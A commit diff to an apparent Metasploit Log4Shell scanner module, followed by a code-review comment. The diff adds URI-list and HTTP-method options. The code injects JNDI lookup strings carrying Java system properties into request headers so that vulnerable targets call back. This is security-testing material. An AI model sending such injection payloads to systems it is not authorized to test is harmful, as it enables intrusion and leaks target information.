Support an input URI list for scanning
zeroSteiner committed Dec 15, 2021
1 parent 0bf355a commit 725904c
Showing 1 changed file with 19 additions and 4 deletions.
23 changes: 19 additions & 4 deletions modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -20,11 +20,13 @@ def initialize
)

register_options([
OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
OptPath.new('HEADERS_FILE', [
true, 'File containing headers to check',
File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
]),
OptPath.new('URIS_FILE', [ false, 'File containing additional URIs to check' ])
])
end

@@ -79,8 +81,21 @@ def replicant
end

# Fingerprint a single host
def run_host(_ip)
method = 'GET'
def run_host(ip)
run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?

return if datastore['URIS_FILE'].blank?

File.open(datastore['URIS_FILE'], 'rb').lines.each do |uri|
uri.strip!
next if uri.start_with?('#')

run_host_uri(ip, normalize_uri(target_uri, uri))
end
end

def run_host_uri(_ip, uri)
method = datastore['HTTP_METHOD']
headers_file = File.open(datastore['HEADERS_FILE'], 'rb')
headers_file.lines.each do |header|
header.strip!
@@ -90,12 +105,12 @@ def run_host(_ip)
@tokens[token] = {
rhost: rhost,
rport: rport,
target_uri: normalize_uri(target_uri),
target_uri: uri,
method: method,
header: header
}
send_request_raw({
'uri' => normalize_uri(target_uri),
'uri' => uri,
'method' => method,
# https://twitter.com/404death/status/1470243045752721408
'headers' => { header => jndi_string("#{token}/${sys:java.vendor}_${sys:java.version}") }
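Review bot: In the new `run_host`, `File.open(datastore['URIS_FILE'], 'rb').lines.each` opens the file without a block, so the handle is never closed explicitly and one is left open for every scanned host; `IO#lines` is also deprecated and was removed in Ruby 3.0. The block form, `File.open(datastore['URIS_FILE'], 'rb') do |f|` with `f.each_line do |uri|` inside, closes the handle when iteration ends. Blank lines in the list are not skipped, so after `strip!` an empty entry presumably normalizes back to the base TARGETURI and repeats the same requests; `next if uri.empty? || uri.start_with?('#')` avoids that. The same unclosed `File.open` on HEADERS_FILE in `run_host_uri` now runs once per URI instead of once per host, so reading the headers once and reusing the list would be cheaper; that method's body continues outside the visible hunks.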
